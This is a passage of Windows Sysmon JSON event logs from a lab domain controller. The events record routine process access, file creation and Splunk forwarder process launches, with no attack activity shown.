06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0512-5F25-0000-0010EF1A1300}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EF1A1300}","TargetProcessId":"3488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.090\r\nSourceProcessGUID: {A837DB8D-0512-5F25-0000-0010EF1A1300}\r\nSourceProcessId: 3488\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.090","SourceProcessGUID":"{A837DB8D-0512-5F25-0000-0010EF1A1300}","SourceProcessId":"3488","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:51.434\r\nProcessGuid: {A837DB8D-050F-5F25-0000-001068141300}\r\nProcessId: 4468\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1174-0\\System.Data.dll\r\nCreationUtcTime: 2020-08-01 06:00:51.434","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:51.434","ProcessGuid":"{A837DB8D-050F-5F25-0000-001068141300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1174-0\\System.Data.dll","CreationUtcTime":"2020-08-01 06:00:51.434","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.577\r\nProcessGuid: {A837DB8D-0513-5F25-0000-0010261D1300}\r\nProcessId: 4572\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.577","ProcessGuid":"{A837DB8D-0513-5F25-0000-0010261D1300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010261D1300}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010261D1300}","TargetProcessId":"4572","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0513-5F25-0000-0010261D1300}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0513-5F25-0000-0010261D1300}","TargetProcessId":"4572","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:51.575\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:51.575","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
